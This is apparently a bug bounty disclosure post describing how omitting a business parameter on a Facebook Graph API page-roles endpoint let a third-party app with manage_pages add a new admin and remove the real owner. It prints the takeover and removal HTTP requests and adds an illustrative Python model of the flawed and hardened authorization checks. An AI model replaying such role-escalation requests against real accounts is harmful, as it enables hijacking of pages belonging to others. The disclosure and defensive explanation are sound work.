A security vulnerability in a Facebook Business Manager endpoint allowed a third-party application with only limited permissions to hack a Facebook page, and the victim permanently loses admin access to that page.

By default, the Facebook application interface does not allow third-party applications to add or modify page admin roles (page roles such as manager, editor, analyst, etc.). Third-party applications are allowed to perform all other operations, like posting statuses on your behalf or publishing photos, but not adding admin roles, because an application that could add or remove admins could add some user as an admin of the page and remove the actual owner permanently.

On the other hand, there is an endpoint for business pages called userpermissions which allows adding or removing page admin roles for users who already belong to the Facebook Business. The following request makes the target user an admin of the page.

Request:
POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>

Response:
true
After a few minutes of testing, I found that removing the business parameter from the request did not throw any error: it allowed us to add anyone as a new page admin and delete the actual page admin on a non-business page where the application had only the manage_pages permission.
That's it! Whatever the application may be, if it holds the admin's manage_pages permission it could hack all of the pages on your Facebook account in a fraction of a second.
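To make the root cause concrete, here is an added example (not Facebook's code, and not from the original post) that models the authorization decision behind a page-role endpoint. The `vulnerable_authorize` function reproduces the fall-through the post describes: the business-association check only runs when a business parameter is present, so omitting it drops down to the ordinary manage_pages check, which was never meant to cover role changes. The `hardened_authorize` function treats a missing business as a deny. The page and business ids, the admin sets, and the last-admin safeguard in `remove_admin` are all my own constructed fixtures and design choices.

```python
"""Model of the authorization decision behind a page-role endpoint.

Added example, not Facebook's code. All ids, fixtures and the last-admin
safeguard are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Optional, Set


@dataclass(frozen=True)
class AppToken:
    app_id: str
    user_id: str            # the user who granted this token to the app
    scopes: frozenset       # permissions granted to the app


@dataclass
class Page:
    page_id: str
    admins: Set[str] = field(default_factory=set)
    business_id: Optional[str] = None   # None: a plain page not attached to any business


# Constructed fixtures: one plain page and one page owned by a business.
PAGES = {
    "page-1": Page("page-1", {"owner-1"}),
    "page-2": Page("page-2", {"owner-2"}, business_id="biz-9"),
}
BUSINESS_ADMINS = {"biz-9": {"owner-2"}}


def vulnerable_authorize(token: AppToken, page_id: str, business_id: Optional[str]) -> bool:
    """Reproduces the defect described in the post.

    The business check is only performed when a business parameter is
    supplied. Without it, the decision falls through to the generic
    manage_pages check, so any app with that scope from a page admin passes.
    """
    page = PAGES.get(page_id)
    if page is None:
        return False
    if business_id is not None:
        return (page.business_id == business_id
                and token.user_id in BUSINESS_ADMINS.get(business_id, set()))
    # Fall-through: content-management scope is wrongly accepted for role changes.
    return "manage_pages" in token.scopes and token.user_id in page.admins


def hardened_authorize(token: AppToken, page_id: str, business_id: Optional[str]) -> bool:
    """Closes the gap: a missing business parameter is a deny, the page must
    belong to that business, and the granting user must administer the business.
    manage_pages alone never authorizes a role change."""
    page = PAGES.get(page_id)
    if page is None or business_id is None:
        return False
    if page.business_id != business_id:
        return False
    return token.user_id in BUSINESS_ADMINS.get(business_id, set())


def remove_admin(page_id: str, user_id: str, token: AppToken,
                 business_id: Optional[str], authorize=hardened_authorize) -> bool:
    """Role removal behind the same gate, plus a refusal to remove the last
    remaining admin (my own safeguard, not something the post attributes to
    Facebook's fix). Returns True only if the role was actually removed."""
    if not authorize(token, page_id, business_id):
        return False
    page = PAGES[page_id]
    if page.admins == {user_id}:
        return False          # never leave a page with no admin at all
    page.admins.discard(user_id)
    return True


if __name__ == "__main__":
    app = AppToken("app-1", "owner-1", frozenset({"manage_pages"}))
    print("vulnerable, no business param:", vulnerable_authorize(app, "page-1", None))
    print("hardened,   no business param:", hardened_authorize(app, "page-1", None))
```

Run as a script it prints `True` for the vulnerable gate and `False` for the hardened one on the same request. The design point is that optional parameters in an authorization path must default to the most restrictive branch, never to a fallback check written for a different, weaker capability.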


Final Proof of Concept:

If the requests above are unclear, please watch this video.

Page Takeover:

Request:
POST /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

role=MANAGER&user=<target_user_id>&access_token=<application_access_token>

Response:
true
 

Removing the Victim:

Request:
DELETE /<page_id>/userpermissions HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

user=<target_user_id>&access_token=<application_access_token>

Response:
true

That's all! The target page is hacked!
 

I reported this vulnerability to the Facebook security team and it is now completely fixed. They rewarded me $2500 USD as part of their bug bounty program. Even though they have placed a fix for this vulnerability, please be aware of the permissions you grant to any application.

The permissions dialog box looks like this:
Manage pages permission dialog box
If manage_pages is requested, note that the app will be able to manage your pages (post statuses, publish photos, etc.).
Don't worry, you can still modify the permissions you have granted to other apps here.
 


Facebook's reply after a few emails
 
Acknowledgement of Fix

  • Rj Manjit

    wow its fake but i love this post ……..
    you can visit my site …..
    http://www.allindiancreation.com
